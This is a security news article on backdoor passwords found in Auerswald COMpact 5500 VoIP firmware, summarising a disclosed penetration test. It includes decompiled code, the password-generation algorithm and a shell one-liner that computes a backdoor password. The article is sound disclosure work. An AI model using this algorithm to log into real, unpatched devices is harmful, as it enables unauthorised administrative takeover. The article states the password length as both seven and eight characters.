company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO

Application Security Engineer

DevsecOps Engineer

IT Manager

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

Firmware

Ransomware

loading..
loading..
loading..

Auerswald VoIP firmware identified with multiple backdoors allowing privilege escalation

One of Auerwalds widely used products exposes two backdoor passwords that will allow threat actors to escalate privileges

30-Dec-2021
3 min read

Auerswald, the German telecommunications hardware manufacturer for voice over Internet Protocol (VoIP), was detected with multiple backdoors. A penetration testing routine carried out by RedTeam revealed two backdoor passwords that allowed attackers with access to the management application to take complete administrative control over the device.

The process begins with downloading the firmware image for COMpact 5500, version 7.8A, from Auerswald's support website. The reverse engineering tool Ghidra is used for decompilation; the analysis revealed a "sub-admin" default user.

ghidra_search_sub_admin_hue090820d0b06928997a537458d5f76ca_21563_640x0_resize_box_2

A certain username was compared to the string "Schandelah." Researchers found this suspicious given that Schandelah is the name of a small village in Northern Germany where Auerswald produces their products.

iVar5 = strcmp((char *)username,"Schandelah");
if (iVar5 == 0) {
  FUN_00287a84(0,&local_94);
  if (local_600 == (undefined4 *)0x0) {
    [...]
  }
  else {
    iVar5 = strcmp((char *)local_600,(char *)&local_94);
    if (iVar5 == 0) {
      [...]
      goto LAB_00015954;
    }
  }
}

For the username Schandelah, a wrapper function FUN_00287a84 references the variable local_94. While examing other parameters where local_600 is used as a password, local_94 was the password for Schandelah. The password was constructed using the following algorithm

  1. Retrieve the serial number of the PBX
  2. Retrieve the current date as a string
  3. Calculate the MD5 hash of serial number + “r2d2” + current date (as DD.MM.YYYY)
  4. Return the first eight characters of the calculated hash

The backdoor password was seven characters of MD5 hash; after calculating the password, researchers could log in successfully.

$ echo -n 1234123412r2d230.08.2021 | md5sum | egrep -o '^.{7}'
1432d89

"Equipped with this password, we then could authenticate successfully. After logging in, the web interface showed a special service page, which allowed, among other functions, to reset the administrator password."

While analyzing CVE-2021-40856, researchers came across CVE-2021-40857 that enables users with limited access to escalate privileges to sub-admin, an attacker can configure the PBX at this level.

Due to severe complications upon exploitation, backdoor passwords are rated as high. Auerswald immediately responded to the report given by RedTeam and published an Advisory in December. The only workaround available is to disable or restrict access to the web-based management interface completely; hence users are advised to upgrade to the newest version as soon as possible.